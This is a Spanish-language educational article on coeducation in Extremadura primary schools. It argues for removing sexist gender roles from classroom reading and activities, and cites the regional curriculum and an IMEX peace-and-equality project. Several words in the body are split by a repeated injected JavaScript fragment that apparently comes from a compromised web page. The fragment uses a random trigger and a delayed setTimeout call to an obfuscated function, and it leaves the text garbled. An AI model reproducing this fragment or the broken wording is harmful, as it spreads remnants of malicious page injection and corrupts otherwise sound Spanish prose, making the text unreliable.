COEDUCACIÓN EN LAS ESCUELAS

Autora: Gema Terrazas Horozco

El proceso de enseñanza está en continuo cambio. A lo largo de la historia de la educación se han desarrollado miles de contenidos (con carácter curricular y otros más generales) que han sido impregnados de las creencias, principios, objetivos, etc. relativos a la época.

Basándonos en el currículo Extremeño de Educación Primaria que recoge: “se considera necesario que la educación, además de favorecer el éxito académico del alumnado, incluya como esenciales los aspectos que contribuyen al desarrollo integral de las personas”, es necesario, hoy en día, “bañar” los contenidos que se ofrecen en el aula con aspectos básicos de la coeducación, para eliminar, de manera progresiva, roles sexistas en nuestras aulas. Se pretende ofrecer al mundo hombres y mujeres preparados y formados para vivir y desenvolverse en la sociedad. Por ello, es necesario conocer este concepto y saber aplicarlo convenientemente en clase.

La coeducación es una corriente que trabaja en la eliminación de los estereotipos marcados referentes al hombre y la mujer: según estos, el hombre es aquel que posee más fuerza, vive más aventuras o es más activo y, frente a este, la mujer es más tímida, demuestra sus sentimientos o es menos activa. Desde la escuela se debe trabajar en la supresión de estos roles presentes en la vida cotidiana y en los juegos o actividades que realizan nuestros alumnos.

Un ejemplo de ello se observa en los libros de lecturas que se ofrecen a los discentes. En la mayoría de estos se presenta a la protagonista con un patrón definido por la timidez, la espera en la solución de un problema y es aquella que muestra sus sentimientos y escucha  a los demás. Por su parte, el protagonista masculino es aquel valiente que desempeña grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes hazañas y nunca muestra sentimientos. La coeducación, en este caso, tratará de mezclar y ofrecer las características que se atribuyen a un sexo, al otro.

Este es el objetivo que se debe perseguir en las escuelas: enseñar a los niños y niñas de la generación futura que todos podemos y que todos somos iguales, que las chicas no tienen porqué llevar asociados unos valores y los chicos, otros; apostandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando porque cada alumno se muestre tal y como es, independientemente de si una parte de la sociedad trata de enmarcarlos en aspectos más femeninos o masculinos, y haciéndoles integrar en su vida el concepto de igualdad.

Todo esto se puede trabajar en el aula a través de proyectos como puede ser la lectura de textos, juegos en equipo, actividades, etc. donde los roles estén alterados o en situaciones espontáneas, naturales, que se den en clase.

Desde esta visión, en Extremadura se están impartiendo cursos donde se aclaran estos conceptos y se muestran indicaciones de intervención en el aula. Así mismo, sobresale el Proyecto “Red Extremeña de Escuelas por una Cultura de Paz, Igualdad, y No Violencia”, promovido por el IMEX, en el cual, a través de cursos, publicaciones y actividades, se aboga por la creación y existencia de una cultura de paz, igualdad y no violencia en nuestras aulas.

En la actualidad, son cada vez más numerosas las acciones dirigidas a transmitir la coeducación en los centros educativos, siendo todos nosotros conocedores de que todo aquello que el alumno aprende jugandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando, interactuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando, lo aprenderá mejor y podrá llevarlo a la práctica en su vida cotidiana.

No se puede olvidar que, aunque los principios fundamentales de la coeducación no se hallen recogidos en el currículo extremeño, sí se hace referencia a ellos en uno de sus objetivos:  m) “Desarrollar sus capacidades afectivas en todos los ámbitos de la personalidad y en sus relaciones con los demás, así como una actitud contraria a la violencia, a los prejuicios de cualquier tipo y a los estereotipos sexistas.”

Por ello, desde las aulas, trabajemos por la sociedad futura, para que, desde su infancia, nuestros alumnos se desarrollen en un entorno de igualdad.

Bibliografía:

  • LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207.
  • DECRETO 82/2007, de 24 de abril, por el que se establece el Currículo de Educación Primaria para la Comunidad Autónoma de Extremadura, DOE, 3 de mayo de 2007, núm.50, p.7825-7929.
  • http:// www.unex.es

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